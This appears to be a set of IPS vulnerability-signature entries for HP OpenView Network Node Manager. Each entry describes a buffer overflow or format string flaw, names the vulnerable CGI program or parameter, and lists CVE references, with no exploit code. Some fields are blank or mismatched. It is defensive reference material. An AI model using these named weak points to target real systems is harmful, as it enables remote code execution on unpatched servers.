HP-OpenView-Network-Node-Manager-Getcvdata.exe-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-199-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in HP OpenView Network Node Manager. The flaw is due to a boundary error when processing HTTP requests sent to CGI program getcvdata.exe. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected process, normally Internet Guest Account on Windows platforms. In an attack case where code injection is not successful, the affected process will terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, normally Internet Guest Account.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Getcvdata.exe-BOF

References:

CVE-2008-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067

BID-33147
http://www.securityfocus.com/bid/33147

HP-OpenView-Network-Node-Manager-Host-Header-BOF

About this vulnerability:

A buffer overflow vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-207-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A vulnerability exists in HP OpenView Network Node Manager software. The vulnerability is due to a boundary error while processing specially crafted HTTP requests sent to the server. Remote attackers could exploit this vulnerability to inject and execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process.

Situation:

HTTP_CS-HP-OpenView-Network-Node-Manager-HTTP-Handling-Buffer-Overflow

References:

CVE-2008-4562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4562

BID-33668
http://www.securityfocus.com/bid/33668

HP-OpenView-Network-Node-Manager-HTTP-Handling-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-149-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager. The flaw is due to a boundary error when processing overly long HTTP GET requests. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected service, which is normally System on Windows platforms.

Situation:

References:

CVE-2008-1697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1697

BID-28569
http://www.securityfocus.com/bid/28569

HP-OpenView-Network-Node-Manager-Invalid-Option-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-317-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager (NNM). The vulnerability is due to a boundary error when handling HTTP requests sent to the jovgraph.exe CGI application. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Invalid-Option-Buffer-Overflow

References:

CVE-2010-1960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1960

BID-40637
http://www.securityfocus.com/bid/40637

HP-OpenView-Network-Node-Manager-Jovgraph-Argument-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Jovgraph-Argument-Buffer-Overflow

References:

CVE-2010-1964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1964

BID-40873
http://www.securityfocus.com/bid/40873

OSVDB-65552
http://www.osvdb.org/65552

HP-OpenView-Network-Node-Manager-Jovgraph-Displaywidth-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow in the HP OpenView Network Node Manager program jovgraph. The vulnerability is due to a boundary error when processing HTTP requests which contain a maliciously crafted displayWidth parameter. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed within the security context of the Internet Guest Account.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Jovgraph-Displaywidth-Buffer-Overflow

References:

CVE-2011-0261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0261

BID-45762
http://www.securityfocus.com/bid/45762

HP-OpenView-Network-Node-Manager-Nameparams-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-393-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager. The vulnerability allws remote attackers to execute arbitrary code via a long nameParams parameter.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-BOF

References:

CVE-2011-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0266

BID-45762
http://www.securityfocus.com/bid/45762

HP-OpenView-Network-Node-Manager-netmon.exe-BOF

About this vulnerability:

A stack buffer overflow vulnerability in the HP OpenView Network Node Manager library ov.dll

Risk:

High

First detected in:

sgpkg-ips-307-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the HP OpenView Network Node Manager library ov.dll. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with an excessively long sel parameter to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-netmon.exe-BOF

References:

CVE-2010-1551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1551

BID-40067
http://www.securityfocus.com/bid/40067

HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager. The vulnerability is due to a boundary error in one of the functions in nnmRptConfig.exe while handling the text1 parameter among the nameParams. Remote attackers can exploit this vulnerability by sending a crafted message to the affected service. Successful exploitation may lead to arbitrary code execution in the context of the affected service.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Nameparams-Text1-BOF

References:

CVE-2011-0268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0268

BID-45762
http://www.securityfocus.com/bid/45762

HP-OpenView-Network-Node-Manager-Nnmrptconfig-Schdparams-And-Nameparams-BOF

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow in HP OpenView Network Node Manager CGI program nnmRptconfig.exe. The vulnerability is due to a boundary error when processing HTTP requests which contain a maliciously crafted schdParams or nameParams parameter. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the context of the affected service.

Situation:

HTTP_CSH-HP-OpenView-Nnmrptconfig-Schd-And-Nameparams-Potential-BOF
HTTP_CRL-HP-OpenView-Nnmrptconfig-Network-Node-Manager-Schd-And-Nameparams-BOF
HTTP_CRL-HP-OpenView-Nnmrptconfig-Network-Node-Manager-Schd-And-Nameparams-BOF-2

References:

CVE-2011-0267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0267

BID-45762
http://www.securityfocus.com/bid/45762

HP-OpenView-Network-Node-Manager-Nnmrptconfig-Template-Format-String

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Format String

Description:

There is a format string vulnerability in HP OpenView Network Node Manager (NNM) CGI program nnmRptconfig.exe. The vulnerability is due to an error when processing HTTP requests containing a maliciously crafted Template name. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed within the security context of the Internet Guest Account user.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Nnmrptconfig-Template-Format-String

References:

CVE-2011-0270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0270

BID-45762
http://www.securityfocus.com/bid/45762

OSVDB-70474
http://www.osvdb.org/70474

HP-OpenView-Network-Node-Manager-Openview5-Cgi-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-247-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in HP OpenView Network Node Manager. The flaw is due to a boundary error when processing HTTP request sent to CGI program OpenView5.exe. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. In an attack case where code injection is not successful, the affected process will terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, normally Internet Guest Account.

Situation:

HTTP_CSU-HP-OpenView-Network-Node-Manager-Openview5-Cgi-Buffer-Overflow

References:

CVE-2008-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067

BID-33147
http://www.securityfocus.com/bid/33147

HP-OpenView-Network-Node-Manager-Ov.dll-ovbuildpath-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

Moderate

First detected in:

sgpkg-ips-438-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in HP OpenView Network Node Manager (NNM). The vulnerability is due to a boundary error in the _OVBuildPath function defined in ov.dll when processing crafted HTTP request parameters. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the jovgraph.exe or the webappmon.exe CGI program on a target server, potentially causing arbitrary code to be injected and executed within the security context of the Internet Guest Account.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Ov.dll-ovbuildpath-Buffer-Overflow

References:

CVE-2011-3167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3167

OSVDB-76775
http://www.osvdb.org/76775

HP-OpenView-Network-Node-Manager-Ovalarm.exe-Accept-Language-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-272-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in HP OpenView Network Node Manager (NNM) CGI program ovalarm.exe. The vulnerability is due to a boundary error when processing the Accept-Language HTTP header and the OvAcceptLang cookie value in a crafted HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server. In an attack scenario where arbitrary code is injected and executed on the target machine, the behavior of the target is dependent on the intention of the malicious code.

Situation:

HTTP_CSH-HP-OpenView-Network-Node-Manager-Ovalarm.exe-Accept-Lang-BOF

References:

CVE-2009-4179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4179

BID-37261
http://www.securityfocus.com/bid/37261

HP-OpenView-Network-Node-Manager-Ovalarmsrv-Integer-Overflow

About this vulnerability:

An integer oveyrflow vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-219-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

An integer overflow vulnerability exists in HP OpenView Network Node Manager software. The flaw is due to improper validation while processing specially crafted requests sent to the ovalarmsrv.exe server. Remote attackers could exploit this vulnerability to inject and execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process. In an attack case where code injection is not successful, the affected process will terminate abnormally.

Situation:

Generic_CS-HP-OpenView-Network-Node-Manager-Ovalarmsrv-Integer-Overflow

References:

CVE-2008-2438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2438

BID-34738
http://www.securityfocus.com/bid/34738

OSVDB-54107
http://www.osvdb.org/54107

HP-OpenView-Network-Node-Manager-Ovalarmsrv-Service-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in HP OpenView Network Node Manager Ovalarmsrv Service.

Situation:

Generic_CS-HP-OpenView-Network-Node-Manager-Ovalarmsrv-Service-Buffer-Overflow

References:

CVE-2008-1852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1852

BID-28668
http://www.securityfocus.com/bid/28668

OSVDB-44654
http://www.osvdb.org/44654

HP-OpenView-Network-Node-Manager-ovet_demandpoll.exe-Format-String

About this vulnerability:

Format string vulnerability in HP OpenView Network Node Manager application ovet_demandpoll.exe

Risk:

High

First detected in:

sgpkg-ips-316-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Format String

Description:

There is a format string vulnerability in the HP OpenView Network Node Manager application ovet_demandpoll.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-ovet_demandpoll.exe-Format-String

References:

CVE-2010-1550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1550

BID-40065
http://www.securityfocus.com/bid/40065

OSVDB-64973
http://www.osvdb.org/64973

HP-OpenView-Network-Node-Manager-OvJavaLocale-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-327-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with an overly long string value of the OvJavaLocale parameter in the HTTP Cookie header to a target server, to execute arbitrary code in the security context of the webappmon.exe process.

Situation:

HTTP_CSH-HP-OpenView-Network-Node-Manager-OvJavaLocale-Buffer-Overflow

References:

CVE-2010-2709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2709

BID-42154
http://www.securityfocus.com/bid/42154

HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-272-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager. The vulnerability is due to a boundary error in ovlogin.exe when processing the username and password parameters sent in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest Account.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow

References:

CVE-2009-3846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3846

BID-37295
http://www.securityfocus.com/bid/37295

HP-OpenView-Network-Node-Manager-OvOSLocale-Parameter-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-214-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in HP OpenView Network Node Manager software. The vulnerability is due to a boundary error while processing specially crafted HTTP requests sent to the server. Remote attackers could exploit this vulnerability to inject and execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process. In an attack case where code injection is not successful, the affected process will terminate abnormally.

Situation:

HTTP_CSH-HP-OpenView-Network-Node-Manager-OvOSLocale-Buffer-Overflow

References:

CVE-2009-0920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0920

BID-34134
http://www.securityfocus.com/bid/34134

HP-OpenView-Network-Node-Manager-ovsessionmgr.exe-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in the HP OpenView Network Node Manager session management process, ovsessionmgr.exe

Risk:

High

First detected in:

sgpkg-ips-289-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the HP OpenView Network Node Manager session management process, ovsessionmgr.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the SYSTEM user.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Ovlogin.exe-Buffer-Overflow

References:

CVE-2009-4176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4176

BID-37330
http://www.securityfocus.com/bid/37330

OSVDB-60927
http://www.osvdb.org/60927

HP-OpenView-Network-Node-Manager-OvWebHelp.exe-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in the HP OpenView Network Node Manager CGI process OvWebHelp.exe

Risk:

High

First detected in:

sgpkg-ips-289-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI process OvWebHelp.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest account.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-OvWebHelp.exe-Buffer-Overflow

References:

CVE-2009-4178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4178

BID-37340
http://www.securityfocus.com/bid/37340

OSVDB-60929
http://www.osvdb.org/60929

HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-OVwSelection-BOF

About this vulnerability:

A buffer overflow vulnerability in the HP OpenView Network Node Manager program ovwebsnmpsrv.exe

Risk:

High

First detected in:

sgpkg-ips-289-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the HP OpenView Network Node Manager program ovwebsnmpsrv.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest account.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-OVwSelection-BOF

References:

CVE-2009-4181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4181

BID-37343
http://www.securityfocus.com/bid/37343

OSVDB-60932
http://www.osvdb.org/60932

HP-OpenView-Network-Node-Manager-Rping-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

Low

First detected in:

sgpkg-ips-229-3038

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in HP Network Node Manager that can allow remote attackers to execute arbitrary code on a vulnerable system. The flaw is due to a boundary error when processing crafted packets sent to the server. Remote attackers can exploit this vulnerability by sending an HTTP request to the affected TCP port. In an attack where code injection is successful, the behavior of the target depends on the intended function of the injected code. The injected code is executed in the security context of the service.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Rping-Stack-Buffer-Overflow

References:

CVE-2009-1420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1420

BID-35267
http://www.securityfocus.com/bid/35267

HP-OpenView-Network-Node-Manager-Schd_select1-Remote-Code-Execution

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager (OV NNM)

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the HP OpenView Network Node Manager (NNM) CGI program nnmRptConfig.exe. The vulnerability is due to a boundary error when processing HTTP requests which contain a maliciously crafted schd_select1 parameter. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Schd_select1-Remote-Code-Execution

References:

CVE-2011-0269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0269

BID-45762
http://www.securityfocus.com/bid/45762

HP-OpenView-Network-Node-Manager-Snmp.exe-Oid-Variable-Buffer-Overflow

About this vulnerability:

A vulnerability in Hewlett-Packard OpenView Network Node Manager (OV NNM)

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in HP OpenView Network Node Manager CGI program snmp.exe. The vulnerability is due to a boundary error while parsing HTTP requests containing an overly long Oid value. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the logic of the malicious code.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-Snmp.exe-Oid-Variable-Buffer-Overflow

References:

CVE-2009-3849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3849

BID-37299
http://www.securityfocus.com/bid/37299

HP-OpenView-Network-Node-Manager-Snmpviewer.exe-Host-Header-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Hewlett-Packard OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-272-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI snmpviewer.exe program. The vulnerability is due to a boundary error when processing the Host header from HTTP requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account.

Situation:

HTTP_CSU-HP-OpenView-Network-Node-Manager-Toolbar.exe-Cgi-Handling-BOF

References:

CVE-2009-4180
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4180

BID-37261
http://www.securityfocus.com/bid/37261

HP-OpenView-Network-Node-Manager-Toolbar.exe-Cgi-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-198-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in HP OpenView Network Node Manager. The flaw is due to a boundary error when processing HTTP request sent to CGI program Toolbar.exe. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected process, normally Internet Guest Account on Windows platforms.

Situation:

References:

CVE-2008-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067

BID-33147
http://www.securityfocus.com/bid/33147

HP-OpenView-Network-Node-Manager-Webappmon.exe-BOF

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in HP OpenView Network Node Manager due to a boundary error when processing HTTP request parameters.

Situation:

HTTP_CSU-HP-OpenView-Network-Node-Manager-Webappmon.exe-BOF

References:

CVE-2011-3166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3166

HP-OpenView-Network-Node-Manager-Webappmon.exe-Cgi-Host-Header-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager (OV NNM)

Risk:

High

First detected in:

sgpkg-ips-272-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager CGI program webappmon.exe. The vulnerability is due to a boundary error when processing the Host header from HTTP requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account.

Situation:

HTTP_CRL-HP-OpenView-NNM-getnnmdata.exe-Cgi-Hostname-Parameter-BOF

References:

CVE-2009-4177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4177

BID-37341
http://www.securityfocus.com/bid/37341

HP-OpenView-NNM-getnnmdata.exe-Cgi-Hostname-Parameter-BOF

About this vulnerability:

A buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe

Risk:

High

First detected in:

sgpkg-ips-305-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager (NNM). The vulnerability is due to a boundary error in getnnmdata.exe when processing the Hostname variable sent in a crafted HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the getnnmdata.exe process. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code.

Situation:

References:

CVE-2010-1555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1555

BID-40072
http://www.securityfocus.com/bid/40072

HP-OpenView-NNM-getnnmdata.exe-Cgi-ICount-Parameter-BOF

About this vulnerability:

A buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe

Risk:

High

First detected in:

sgpkg-ips-306-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with an excessively long ICount value to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.

Situation:

HTTP_CS-HP-OpenView-NNM-getnnmdata.exe-Cgi-ICount-Parameter-BOF

References:

CVE-2010-1554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1554

BID-40071
http://www.securityfocus.com/bid/40071

HP-OpenView-NNM-getnnmdata.exe-Cgi-MaxAge-Parameter-BOF

About this vulnerability:

A buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe

Risk:

High

First detected in:

sgpkg-ips-306-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with an excessively long MaxAge value to a vulnerable server, potentially causing arbitrary code execution with the privileges of the Internet Guest Account user.

Situation:

HTTP_CS-HP-OpenView-NNM-getnnmdata.exe-Cgi-MaxAge-Parameter-BOF

References:

CVE-2010-1553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1553

BID-40070
http://www.securityfocus.com/bid/40070

HP-OpenView-NNM-ovutil.dll-getProxiedStorageAddress-BOF

About this vulnerability:

A buffer overflow vulnerability in HP OpenView Network Node Manager ovwebsnmpsrv.exe

Risk:

High

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP OpenView Network Node Manager (NNM) ovwebsnmpsrv.exe. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with a crafted arg value to the jovgraph.exe CGI application, potentially causing arbitrary code execution within the security context of the Internet Guest account.

Situation:

HTTP_CRL-HP-OpenView-NNM-ovutil.dll-getProxiedStorageAddress-BOF

References:

CVE-2010-1961
